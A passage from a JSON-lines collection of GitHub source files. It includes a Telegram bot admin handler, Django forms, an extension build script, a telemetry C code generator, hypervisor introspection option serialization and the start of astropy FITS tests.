open(logFILE,\"a\")\n\t_LOG.write(txt+\"\\n\")\n\t_LOG.close()\n\n\t\n\t\n\t\n\t\t\n\n","repo_name":"wildfandango/pyLAUNCH","sub_path":"plfiles.py","file_name":"plfiles.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3287559688","text":"from aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram import types, Dispatcher\nfrom createbot import dp, bot, GLOBAL_PATH, db\n\n\nasync def command_admin(message: types.Message):\n msg_admin = message.text\n file_id = \"\"\n price = 0\n i = 0\n\n if msg_admin[:8] == \"Одобрить\": # Одобрить 15 40\n buffer = msg_admin[9:]\n while buffer[i] != \" \":\n file_id += buffer[i]\n i += 1\n price = buffer[i:]\n\n user_id = db.get_user_id(file_id)\n await bot.send_message(user_id, f\"Ваш файл одобрен!\\n Цена распечатки: {price} руб.\")\n\n elif msg_admin[9:] == \"Отклонить\": # Отклонить 15 Ты прислал чёрный лист!\n buffer = msg_admin[10:]\n reason = \"\"\n while buffer[i] != \" \":\n file_id += buffer[i]\n i += 1\n\n reason = buffer[i+1:]\n user_id = db.get_user_id(file_id)\n await bot.send_message(user_id, \"Ваш файл был отклонён! Причина:\\n\\\"\"+reason+\"\\\"\")\n # Отклонённый файл будет удалятся с бд\n # db.delete_file(file_id)\n\ndef register_handlers_admin(dp: Dispatcher):\n dp.register_message_handler(command_admin, is_chat_admin=True)\n","repo_name":"mEldevlp/tg-bot-nov-print-bot","sub_path":"handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28364388061","text":"from django.forms import ModelForm, formset_factory, Select\nfrom django import forms\nfrom django.core.exceptions import NON_FIELD_ERRORS\nfrom django.utils.translation import gettext_lazy as _\n\nfrom gestion_imprenta.models import SolicitudPresupuesto, SolicitudPresupuestoTerminaciones, Material, Cantidad,\\\n MedidaEstandar, Trabajo, Contacto, Cliente, ColorImpresion, Envio, Terminacion\n\n\nclass SolicitudPresupuestoForm(ModelForm):\n field_order = ['trabajo', 'material', 'color_impresion', 'medida_estandar', 'solicitud_orientacion',\n 'cantidad_estandar', 'solicitud_doble_cara_impresion_flg', 'solicitud_disenio_flg',\n 'solicitud_terminacion_flg', 'solicitud_adjunto_1', 'solicitud_adjunto_2', 'solicitud_adjunto_3',\n 'solicitud_express_flg', 'envio','solicitud_comentarios_cliente', 'doble_cara_flg' ]\n\n class Meta:\n model = SolicitudPresupuesto\n exclude = ['solicitud_email_enviado_flg',\n 'maquina_pliego',\n 'solicitud_terminaciones',\n 'contactos'\n ]\n\n labels = {\n 'solicitud_disenio_flg': _('Requiere diseño'),\n 'solicitud_comentarios_cliente': _('Comentarios adicionales'),\n 'solicitud_terminacion_flg': _('Requiere terminaciones'),\n 'solicitud_express_flg': _('Requiere prioridad (Express)'),\n 'solicitud_doble_cara_impresion_flg': _('Requiere impresión doble faz'),\n 'solicitud_adjunto_1': _('Suba su archivo (1)'),\n 'solicitud_adjunto_2': _('Suba su archivo (2)'),\n 'solicitud_adjunto_3': _('Suba su archivo (3)'),\n 'solicitud_orientacion': _('Orientación del trabajo'),\n 'trabajo': _('Seleccione el trabajo deseado'),\n 'color_impresion': _('Seleccione el color de impresión'),\n 'material': _('Seleccione el material'),\n 'envio': _('Seleccione el método de envío'),\n 'medida_estandar': _('Seleccione medida'),\n 'cantidad_estandar': _('Seleccion la cantidad')\n }\n\n 
help_texts = {\n            'solicitud_express_flg': _('Envío Express tiene costo adicional')\n        }\n\n        localized_fields = '__all__'\n\n\nclass SolicitudContactoForm(ModelForm):\n    field_order = ['tipo_dato_contacto', 'dato_contacto_valor']\n    prosp_nombre = forms.CharField(max_length=25, min_length=3, strip=True, label=_('Nombre'))\n    prosp_apellido = forms.CharField(max_length=25, min_length=3, strip=True, label=_('Apellido'))\n\n    class Meta:\n        model = Contacto\n        fields = ['tipo_dato_contacto', 'dato_contacto_valor']\n        labels = {\n            'tipo_dato_contacto': _('Tipo de contacto'),\n            'dato_contacto_valor': _('Contacto')\n        }\n        localized_fields = '__all__'\n\n\nSpContactoFormset = formset_factory(\n    form=SolicitudContactoForm,\n    extra=1,\n    max_num=2\n)\n\n\nclass SolicitudTerminacionesForm(ModelForm):\n    field_order = ['terminacion', 'doble_cara_flg', 'comentarios']\n\n    class Meta:\n        model = SolicitudPresupuestoTerminaciones\n        exclude = ['solicitud', 'maquina_terminacion']\n        labels = {\n            'terminacion': _('Terminación'),\n            'doble_cara_flg': _('Aplicar en ambas caras'),\n            'comentarios': _('Comentarios'),\n        }\n        localized_fields = '__all__'\n        widgets = {\n            'terminacion': Select(attrs={'class': 'clase_terminacion'}),\n        }\n\n\nSpTerminacionesFormset = formset_factory(\n    form=SolicitudTerminacionesForm,\n    extra=1,\n    max_num=3\n)\n","repo_name":"Ceci1408/safetag_2019","sub_path":"safetag/gestion_clientes_pedidos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24926145555","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.forms.widgets import SelectDateWidget\nfrom .models import AccountsModel, TwitterAPIModel\n\n\nclass RegistrationUserForm(UserCreationForm):\n    \"\"\" The form for sign up \"\"\"\n    class Meta:\n        model = AccountsModel\n        fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n\nclass AccountUpdateForm(UserChangeForm):\n    \"\"\" Form for account updating \"\"\"\n    class Meta:\n        model = AccountsModel\n        fields = ('email', 'username', 'first_name', 'last_name',\n                  'gender', 'date_of_birth', 'avatar', 'twitter',\n                  'mastodon', 'signal', 'github', 'telegram')\n        widgets = {\"date_of_birth\": SelectDateWidget(years=range(1920, 2023))}\n\n    def clean(self):\n        \"\"\" If {Clear} was chosen, delete the stored file \"\"\"\n        cleaned_data = super().clean()\n        avatar_clear = cleaned_data.get(\"avatar\")\n\n        if avatar_clear is False:\n            self.instance.avatar.delete(False)\n\n\nclass TwitterAPIForm(UserChangeForm):\n    \"\"\" For updating social media credentials \"\"\"\n    class Meta:\n        model = TwitterAPIModel\n        fields = ('consumer_key', 'consumer_secret', 'access_token', 'access_token_secret')\n","repo_name":"vomanc/Vomancus","sub_path":"project/account/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"39962444113","text":"from __future__ import print_function\nimport json\nimport os\nimport shutil\nimport subprocess\nimport zipfile\n\nprint(\"building host\")\ntry:\n    os.remove(\"build/gpsio-installer.zip\")\nexcept:\n    pass\n\nzipf=zipfile.ZipFile(\"build/gpsio-installer.zip\", \"w\", zipfile.ZIP_DEFLATED)\nhost_filenames = (\"install.py\",\"wrapper.py\",\"wrapper.bat\")\nfor filename in host_filenames:\n    zipf.write(\"host/\" + filename, \"gpsio-installer/\" + filename)\nzipf.close()\n\nextension_filenames = 
(\"background.js\",\"content_script.js\",\"gps.png\",\"popup.html\",\"popup.js\")\ndef create_extension_zip(name, manifest):\n zipf=zipfile.ZipFile(\"build/\" + name + \".zip\", \"w\", zipfile.ZIP_DEFLATED)\n for filename in extension_filenames:\n zipf.write(\"extension/\" + filename, filename)\n zipf.writestr(\"manifest.json\", json.dumps(manifest))\n zipf.close()\n \nmanifest=json.loads(open('extension/manifest.json').read())\nprint(\"building extension zipfiles\")\ntry:\n os.remove(\"build/firefox-1.zip\")\n os.remove(\"build/firefox-2.zip\")\n os.remove(\"build/chrome-1.zip\")\n os.remove(\"build/chrome-2.zip\")\nexcept:\n pass\n\n\nmanifest.pop('key', None)\ncreate_extension_zip(\"firefox-1\", manifest)\n\nmanifest['applications']['gecko']['id']='gpsio2@caltopo.com'\nmanifest['content_scripts'][0]['matches'] = [\"https://caltopo.com/*\",\"http://caltopo.com/*\",\"https://sartopo.com/*\",\"http://sartopo.com/*\",\"http://localhost:8080/*\"]\ncreate_extension_zip(\"firefox-2\", manifest)\n\nmanifest.pop('applications', None)\ncreate_extension_zip(\"chrome-2\", manifest)\nmanifest['content_scripts'][0]['matches'] = [\"https://*/*\",\"http://*/*\"]\ncreate_extension_zip(\"chrome-1\", manifest)\n","repo_name":"kbisset/gpsio","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13000875397","text":"# Сложность алгоритма линейная O(N)\ndef task(array):\n try:\n for i in array:\n if i == 0 or i == '0':\n print(f'Индекс первого нуля {array.index(i)}')\n break\n else:\n print('В массиве нет нуля!')\n except AttributeError as e:\n print(f'{e} Неправильные данные')\n except TypeError as e:\n print(f'{e} Неправильные данные')\n\n\n# 2 вариант, но он на мой взгляд хуже, так как не все случаи отрабатывает, например если в списке будет не 0, а \"0\".\n# Но, возможно, в некоторых случаях может применяться. Приложил для примера.\n\n# def task(array):\n#\n# try:\n# if isinstance(array, str):\n# print(f'Индекс первого нуля {array.index(\"0\")}')\n# elif isinstance(array, list):\n# print(f'Индекс первого нуля {array.index(0)}')\n# else:\n# print('неправильные данные')\n# except ValueError:\n# print('В массиве нет нуля!')\n\n# Тесты\nif __name__ == '__main__':\n task([1, 3, \"0\", 4, 0])\n task([1, 3, 4])\n task([0, 1, 3, 4])\n task('1548440')\n task('15484')\n task((1, 2, 0))\n task({1, 2, 3, 0})\n","repo_name":"leget1987/test_task","sub_path":"task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30257752546","text":"###############################################################################\r\n# Project: UMDLoop\r\n# Module: CodeSource\r\n# File: CodeSource.py\r\n###############################################################################\r\n# Purpose:\r\n#\r\n# This class will contain functions to generate a C source file\r\n# that defines code to build and send telemetry packets.\r\n###############################################################################\r\n# Change History:\r\n#\r\n# Author Date Description of Change\r\n# ---------- -------- --------------------------------------------------\r\n# Ryan W. 
11-11-18 Initial version.\r\n###############################################################################\r\n\r\nimport re\r\nimport math\r\nfrom fractions import Fraction\r\nimport CodeHeader\r\n\r\ndef source_definition(tlm):\r\n source = imports()\r\n source += defines(tlm)\r\n source += main_thread(tlm)\r\n source += build_tlm(tlm)\r\n \r\n return source\r\n\r\ndef imports():\r\n imports = '#include <sys/socket.h>\\n'\r\n imports += '#include <string.h>\\n'\r\n imports += '#include <stdlib.h>\\n'\r\n imports += '#include <time.h>\\n'\r\n imports += '#include <errno.h>\\n'\r\n imports += '#include <stdio.h>\\n'\r\n imports += '#include \"spacex.h\"\\n'\r\n imports += '#include \"telemetry.h\"\\n\\n\\n'\r\n \r\n return imports\r\n\r\ndef defines(tlm):\r\n # Determine packet length\r\n pkt_length = 0\r\n for item in tlm.get_all():\r\n try:\r\n pkt_length += int(item.high_rate) * int(item.bit_length)\r\n except:\r\n pkt_length += int(item.bit_length)\r\n \r\n # Convert bits to bytes, round up\r\n pkt_length = math.ceil(pkt_length / 8)\r\n \r\n # Calculate packet period in nanoseconds\r\n total_ns = int(1000000000 / tlm.config[\"packet_frequency\"])\r\n \r\n defines = f'#define PKT_LENGTH {pkt_length}\\n'\r\n defines += f'#define TLM_FREQ {total_ns}L\\n'\r\n defines += '#define NS_IN_SEC 1000000000L\\n'\r\n defines += '#define UPDATE_DELAY(name) name.tv_sec = name.tv_sec + ((name.tv_nsec + TLM_FREQ) / NS_IN_SEC);\\\\\\n'\r\n defines += ' name.tv_nsec = (name.tv_nsec + TLM_FREQ) % NS_IN_SEC;\\n'\r\n defines += '#define INIT_TIMES(name, time) sec = name.tv_sec + ((name.tv_nsec + time) / NS_IN_SEC);\\\\\\n'\r\n defines += ' nsec = (name.tv_nsec + time) % NS_IN_SEC;\\n\\n'\r\n return defines\r\n\r\ndef main_thread(tlm):\r\n # Begin writing send_tlm function\r\n main = 'void *send_tlm(void *args) {\\n'\r\n main += ' Telemetry tlm;\\n\\n'\r\n \r\n # Unpack thread arguments\r\n main += ' int socket = ((TelemetryArgs *)args)->socket;\\n'\r\n main += ' SA * dest_addr = ((TelemetryArgs *)args)->dest_addr;\\n'\r\n main += ' socklen_t dest_len = ((TelemetryArgs *)args)->dest_len;\\n\\n'\r\n \r\n main += current_time()\r\n \r\n # Create time structs for delays between tlm udpates\r\n time = 0\r\n total_ns = 1000000000 / tlm.config[\"packet_frequency\"]\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n for i in range(0, len(fns)):\r\n numerator = int(re.sub('(?!_)\\D', '', fns[i]).split('_')[2])\r\n denominator = int(re.sub('(?!_)\\D', '', fns[i]).split('_')[3])\r\n \r\n delay = int((total_ns * numerator / denominator) - time);\r\n time = total_ns * numerator / denominator\r\n \r\n if i == 0:\r\n main += f' INIT_TIMES(now, {delay}L)\\n'\r\n else:\r\n main += f' INIT_TIMES(delay_{i}, {delay}L)\\n'\r\n main += f' struct timespec delay_{i+1} = {{sec, nsec}};\\n\\n'\r\n main += '\\n'\r\n \r\n # Open infinite loop to send telemetry\r\n main += ' while(1) {\\n'\r\n \r\n # Call update functions and send telemetry\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n clk = 'CLOCK_MONOTONIC'\r\n for i in range(0, len(fns)):\r\n call = fns[i][5:].replace(\"Telemetry *\", \"&\")\r\n main += f' clock_nanosleep({clk}, TIMER_ABSTIME, &delay_{i+1}, NULL);\\n'\r\n main += f' {call}\\n\\n'\r\n \r\n main += ' if(sendto(socket, &tlm, PKT_LENGTH, 0, dest_addr, dest_len) == -1) {\\n'\r\n main += ' printf(\"%s\\\\n\", strerror(errno));\\n'\r\n main += ' //TODO: Comm Loss\\n'\r\n main += ' }\\n\\n'\r\n \r\n main += ' if(send_spacex(&tlm) == -1) {\\n'\r\n main += ' //TODO: Comm Loss\\n'\r\n main += ' 
}\\n\\n'\r\n \r\n for i in range(0, len(fns)):\r\n main += f' UPDATE_DELAY(delay_{i+1})\\n'\r\n \r\n main += ' }\\n}\\n\\n'\r\n \r\n return main\r\n\r\ndef current_time():\r\n return \"\"\" struct timespec now;\r\n if(clock_gettime(CLOCK_MONOTONIC, &now) == -1) {\r\n printf(\"clock_gettime() error: %s\\\\n\", strerror(errno));\r\n exit(-3);\r\n }\r\n __time_t sec = now.tv_sec;\r\n __syscall_slong_t nsec = now.tv_nsec;\\n\\n\"\"\"\r\n\r\ndef build_tlm(tlm):\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n all_rates = tlm.get_all_rates()\r\n build_fns = ''\r\n \r\n # Get set of numeric rate divisions\r\n rates = set([int(x) for x in tlm.rates if valid_int(x)])\r\n \r\n for fn in fns:\r\n # Remove semicolon and open curly brace\r\n fn = fn[:-1] + ' {\\n'\r\n \r\n # Get fraction of current update function\r\n numerator = int(re.sub('(?!_)\\D', '', fn).split('_')[2])\r\n denominator = int(re.sub('(?!_)\\D', '', fn).split('_')[3])\r\n fn_frac = Fraction(numerator, denominator)\r\n \r\n # Determine which rates to update in this function\r\n update_list = []\r\n for r in rates:\r\n for i in range(1, r+1):\r\n frac = Fraction(i, r)\r\n if frac == fn_frac:\r\n update_list.append(r)\r\n \r\n # If fn_frac is 1, then update all parameters\r\n if fn_frac == 1:\r\n for item in tlm.get_all():\r\n fn += item.update_definition(False)\r\n else:\r\n for x in update_list:\r\n for item in all_rates[str(x)]:\r\n fn += item.update_definition(fn_frac)\r\n \r\n # Close curly brace\r\n fn += '}\\n\\n'\r\n \r\n build_fns += fn\r\n \r\n return build_fns\r\n\r\ndef valid_int(input):\r\n try:\r\n int(input)\r\n return True\r\n except:\r\n return False\r\n","repo_name":"umdloop/unnamed-pod","sub_path":"Telemetry_Framework/Python/CodeSource.py","file_name":"CodeSource.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862269494","text":"# There is an m x n grid, where (0, 0) is the top-left cell and (m - 1, n - 1) is the bottom-right cell. You are given an integer array startPos where startPos = [startrow, startcol] indicates that initially, a robot is at the cell (startrow, startcol). You are also given an integer array homePos where homePos = [homerow, homecol] indicates that its home is at the cell (homerow, homecol).\n\n# The robot needs to go to its home. It can move one cell in four directions: left, right, up, or down, and it can not move outside the boundary. Every move incurs some cost. 
You are further given two 0-indexed integer arrays: rowCosts of length m and colCosts of length n.\n\n# If the robot moves up or down into a cell whose row is r, then this move costs rowCosts[r].\n# If the robot moves left or right into a cell whose column is c, then this move costs colCosts[c].\n\n# Return the minimum total cost for this robot to return home.\n\n# Could be more efficiently implemented by doing some basic row / column math but this\n# is just a straightforward method\n\nfrom typing import List\n\nclass Solution:\n    def minCost(self, startPos: List[int], homePos: List[int], rowCosts: List[int], colCosts: List[int]) -> int:\n        total = 0\n        \n        row,col = startPos[0], startPos[1]\n        if row < homePos[0]:\n            while row<homePos[0]:\n                row += 1\n                total += rowCosts[row]\n        elif row > homePos[0]:\n            while row > homePos[0]:\n                row -= 1\n                total += rowCosts[row]\n        \n        if col > homePos[1]:\n            while col > homePos[1]:\n                col -= 1\n                total += colCosts[col]\n        elif col < homePos[1]:\n            while col < homePos[1]:\n                col += 1\n                total += colCosts[col]\n        return total\n\n# Time complexity is O(N + M) as in the worst case we need to traverse the grid from corner to corner \n\n# Space complexity is O(1)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/DynamicProgramming/minimumCostHomecomingOfRobitInGrid.py","file_name":"minimumCostHomecomingOfRobitInGrid.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"74063053494","text":"from abc import ABC, abstractmethod\nfrom json import dump, load\nfrom dataclasses import dataclass\nfrom typing import Optional, Union, Dict\nfrom pathlib import Path\n\n\n@dataclass\nclass TelegramAppInfo(ABC):\n\n    \"\"\"Structure that stores app info\"\"\"\n\n    _id: Optional[str] = None\n    _hash: Optional[str] = None\n    session: str = \"session\"\n\n    @abstractmethod\n    def read_config(self, conf: Optional[Union[Path, str, Dict[str, str]]]) -> None:\n        pass\n\n    @property\n    def api_id(self):\n        if not self._id:\n            raise ConfigNotRead()\n        return self._id\n\n    @property\n    def api_hash(self):\n        if not self._hash:\n            raise ConfigNotRead()\n        return self._hash\n\n\nclass ConfigNotRead(Exception):\n\n    message = \"Configuration file was not read!\"\n\n\n@dataclass\nclass TelegramAppInfoFromJson(TelegramAppInfo):\n\n    \"\"\"TelegramAppInfo implementation that receives path to json config as argument\"\"\"\n\n    def read_config(self, conf=\"tg_id_and_hash.json\") -> None:\n        try:\n            with open(conf) as file:\n                conf_info = load(file)\n                self._id = conf_info[\"api_id\"]\n                self._hash = conf_info[\"api_hash\"]\n        except KeyError as e:\n            raise Exception(f\"api id or api hash not in configuration file with path: {conf}\") from e\n        except FileNotFoundError as e:\n            raise Exception(f\"No configuration file with path: {conf}\") from e\n","repo_name":"blueflyingpanda/tg_parser_with_scheduler","sub_path":"tg_app_info.py","file_name":"tg_app_info.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34197738967","text":"import yaml\nimport struct\nimport os\nimport crc32\nimport intro_defines\nfrom objects import CamiYAMLObject, CamiObject, CamiDataTable, CamiAtom, FilePointerException, get_all_objects\n\noptions = {}\n\nknown_encodings = [\"utf-8\", \"utf-16\"]\n\n\nclass GlobalIntrocoreOptions(CamiYAMLObject):\n    yaml_tag = u'!global_introcore_options'\n\n    def post_create(self, state):\n        if \"globals\" in options:\n            raise Exception(\"Global options 
already loaded\")\n options[\"globals\"] = {}\n options[\"globals\"].update(state)\n\n\nclass ProcessOptions(CamiYAMLObject, CamiAtom):\n \"\"\"\n\ttypedef struct _CAMI_PROC_PROT_OPTIONS\n\t{\n\t\tunion\n\t\t{\n\t\t\tWCHAR Name16[32];\n\t\t\tCHAR Name8[64];\n\t\t}\n\t\tDWORD OptionsOffset;\n\t\tDWORD Flags;\n\n\t\tQWORD _Reserved1;\n\t\tDWORD _Reserved2;\n\t\tDWORD _Reserved3;\n\n\t} CAMI_PROC_PROT_OPTIONS;\n\t\"\"\"\n\n yaml_tag = \"!process_options\"\n\n descriptor_layout = \"<64sIIQII\"\n\n encoding = \"utf-8\"\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n return self.__dict__ == other.__dict__\n\n def get_descriptor(self):\n if self.encoding not in known_encodings:\n raise Exception(\"Invalid encoding: {}\".format(encoding))\n\n flags = 0\n skip = 0\n\n if self.encoding == \"utf-16\":\n flags |= intro_defines.process_options_flags[\"name_utf16\"]\n skip = 2\n\n return struct.pack(\n self.descriptor_layout,\n bytes(self.name, self.encoding)[skip:],\n self.options.get_file_pointer(),\n flags,\n 0,\n 0,\n 0,\n )\n\n def serialize(self, start):\n return self.options.serialize(start)\n\n def __repr__(self):\n return self.name + \", \" + repr(self.options)\n\n\nclass ProcessOptionsList(CamiDataTable):\n entry_type = ProcessOptions\n\n\nclass Options:\n def __init__(self):\n self.core_options = IntrocoreOptions()\n self.shemu_options = IntrocoreOptions()\n self.proc_options = ProcessOptionsList()\n\n def apply(self, other):\n self.core_options.apply(other.core_options)\n self.shemu_options.apply(other.shemu_options)\n for opt_to_apply in other.proc_options.get_entries():\n found = False\n\n for opt in self.proc_options.get_entries():\n if opt.name == opt_to_apply.name:\n opt.options.apply(opt_to_apply.options)\n found = True\n\n if not found:\n self.proc_options.add_entry(opt_to_apply)\n\n\nclass GlobalOptions(Options, CamiYAMLObject):\n yaml_tag = \"!global_options\"\n\n def post_create(self, state):\n self.proc_options = ProcessOptionsList()\n self.proc_options.set_entries(state[\"proc_options\"])\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n return self.__dict__ == other.__dict__\n\n\nclass OsOptions(Options, CamiYAMLObject, CamiObject):\n yaml_tag = \"!os_options\"\n \"\"\"\n typedef struct _CAMI_CUSTOM_OS_PROTECTION\n {\n DWORD CoreOptionsOffset; // Intro core options. Filepointer to a CAMI_PROT_OPTIONS structure\n DWORD ProcOptionsCount; // Proc options count\n DWORD ProcOptionsTable; // Process protection options. Pointer to a CAMI_PROC_PROT_OPTIONS[] array\n DWORD ShemuOptions; // Shemu options. 
Filepointer to a CAMI_PROT_OPTIONS structure\n QWORD _Reserved2;\n } CAMI_CUSTOM_OS_PROTECTION;\n \"\"\"\n descriptor_layout = \"<IIIIQ\"\n\n def __init__(self, other):\n self.core_options = other.core_options\n self.proc_options = other.proc_options\n self.shemu_options = other.shemu_options\n self.version = None\n self.os_type = None\n\n def post_create(self, state):\n self.proc_options = ProcessOptionsList()\n self.proc_options.set_entries(state[\"proc_options\"])\n\n def get_binary_size(self):\n return struct.calcsize(self.descriptor_layout)\n\n def get_binary(self):\n return struct.pack(\n self.descriptor_layout,\n self.core_options.get_file_pointer(),\n self.proc_options.get_entry_count(),\n self.proc_options.get_file_pointer(),\n self.shemu_options.get_file_pointer(),\n 0,\n )\n\n def serialize(self, start):\n try:\n self.set_file_pointer(start)\n data = self.core_options.serialize(start + self.get_binary_size())\n data += self.proc_options.serialize(start + self.get_binary_size() + len(data))\n data += self.shemu_options.serialize(start + self.get_binary_size() + len(data))\n return self.get_binary() + data\n except FilePointerException:\n return bytes()\n\n def __repr__(self):\n return \"Core: \" + repr(self.core_options) + \" Process: \" + repr(self.proc_options) + \\\n \" Shemu: \" + repr(self.shemu_options)\n\n\nclass IntrocoreOptions(CamiYAMLObject, CamiObject):\n yaml_tag = \"!options_control\"\n \"\"\"\n typedef struct _CAMI_PROT_OPTIONS\n {\n QWORD ForceOff; // Options which will be disabled\n QWORD ForceBeta; // Options beta only\n QWORD ForceFeedback; // Options feedback only\n QWORD ForceOn; // Options which will be enabled by default\n DWORD _Reserved2;\n DWORD _Reserved3;\n } CAMI_PROT_OPTIONS;\n \"\"\"\n\n descriptor_layout = \"<QQQQII\"\n\n def __init__(self):\n self.force_off = 0\n self.force_beta = 0\n self.force_feedback = 0\n self.force_on = 0\n\n def get_options_value(self, opts_list):\n opts = 0\n\n for opt in opts_list:\n opts |= intro_defines.intro_options[opt]\n\n return opts\n\n def post_create(self, state):\n self.force_off = self.get_options_value(self.force_off)\n self.force_beta = self.get_options_value(self.force_beta)\n self.force_feedback = self.get_options_value(self.force_feedback)\n self.force_on = self.get_options_value(self.force_on)\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n\n return self.__dict__ == other.__dict__\n\n def __repr__(self):\n return \"off: 0x%lx beta: 0x%lx feedback: 0x%lx on: 0x%lx\" % (\n self.force_off,\n self.force_beta,\n self.force_feedback,\n self.force_on,\n )\n\n def apply(self, other):\n self.force_off |= other.force_off\n self.force_beta |= other.force_beta\n self.force_feedback |= other.force_feedback\n self.force_on |= other.force_on\n\n def get_binary(self):\n # if you add any other fields make sure you update the if statement in serialize\n return struct.pack(\n self.descriptor_layout, self.force_off, self.force_beta, self.force_feedback, self.force_on, 0, 0,\n )\n\n def serialize(self, start):\n try:\n self.set_file_pointer(start)\n\n return self.get_binary()\n\n except FilePointerException:\n pass\n\n return bytes()\n\n\ndef apply_globals():\n global options\n\n # first apply global intro options to os type specific options\n options[\"globals\"][\"linux\"].apply(options[\"globals\"][\"common\"])\n options[\"globals\"][\"windows\"].apply(options[\"globals\"][\"common\"])\n\n # then apply the os type 
specific options to each os\n for os_options in options[\"per_os\"]:\n os_options.apply(options[\"globals\"][os_options.os_type])\n\n\ndef create_global_defaults():\n global options\n if \"globals\" in options:\n # global options are loaded. no need to create defaults\n return\n\n options[\"globals\"] = {}\n options[\"globals\"][\"common\"] = GlobalOptions()\n options[\"globals\"][\"linux\"] = GlobalOptions()\n options[\"globals\"][\"windows\"] = GlobalOptions()\n\n\ndef create_defaults():\n global options\n\n options[\"default\"] = {}\n options[\"default\"][\"linux\"] = OsOptions(options[\"globals\"][\"linux\"])\n\n if options[\"globals\"][\"linux\"] == options[\"globals\"][\"windows\"]:\n options[\"default\"][\"windows\"] = options[\"default\"][\"linux\"]\n\n else:\n options[\"default\"][\"windows\"] = OsOptions(options[\"globals\"][\"windows\"])\n\n\ndef create_per_os_options_list():\n global options\n\n options[\"per_os\"] = []\n\n try:\n options[\"per_os\"].extend(get_all_objects(OsOptions))\n except KeyError:\n # This is fine. It means no custom options have been set (or at least loaded).\n pass\n\n\ndef get_options_for_os_version(version):\n global options\n\n if options is None:\n raise Exception(\"Intro options not loaded!\")\n\n for os_options in options[\"per_os\"]:\n if os_options.version == version:\n return os_options\n\n if type(version) is str:\n return options[\"default\"][\"linux\"]\n\n elif type(version) is tuple:\n return options[\"default\"][\"windows\"]\n\n raise Exception(\"Unknown os type for version {} ({})\".format(version, type(version)))\n\n\ndef craft_options():\n create_global_defaults()\n\n create_per_os_options_list()\n\n apply_globals()\n\n create_defaults()\n","repo_name":"bitdefender/hvmi","sub_path":"cami/scripts/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":601,"dataset":"github-code","pt":"21"} +{"seq_id":"39973933102","text":"import pickle\nimport mouse\n\n\nclass MouseModulePlayback:\n def __init__(self, data) -> None:\n self.data = data\n\n\n def play(self, speed_factor=1.0) -> None:\n if not self.data:\n raise RuntimeError(\"`data` cannot be None\")\n if \"events\" not in self.data:\n raise RuntimeError(\"`data['events']` cannot be None\")\n\n mouse.play(self.data[\"events\"], speed_factor=speed_factor)\n mouse.unhook_all()\n\n\ndef main():\n with open(\"recording_1.zvt\", \"rb\") as f:\n data = pickle.load(f)\n playback = MouseModulePlayback(data)\n playback.play(3.0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/Built_In_Automation/Desktop/RecordPlayback/MouseModulePlayback.py","file_name":"MouseModulePlayback.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"18588443691","text":"import gc\nimport warnings\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_allclose, assert_array_equal\n\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.io.fits import (\n BinTableHDU,\n HDUList,\n ImageHDU,\n PrimaryHDU,\n connect,\n table_to_hdu,\n)\nfrom astropy.io.fits.column import (\n _fortran_to_python_format,\n _parse_tdisp_format,\n python_to_tdisp,\n)\nfrom astropy.io.tests.mixin_columns import compare_attrs, mixin_cols, serialized_names\nfrom astropy.table import Column, MaskedColumn, QTable, Table\nfrom astropy.table.table_helpers import 
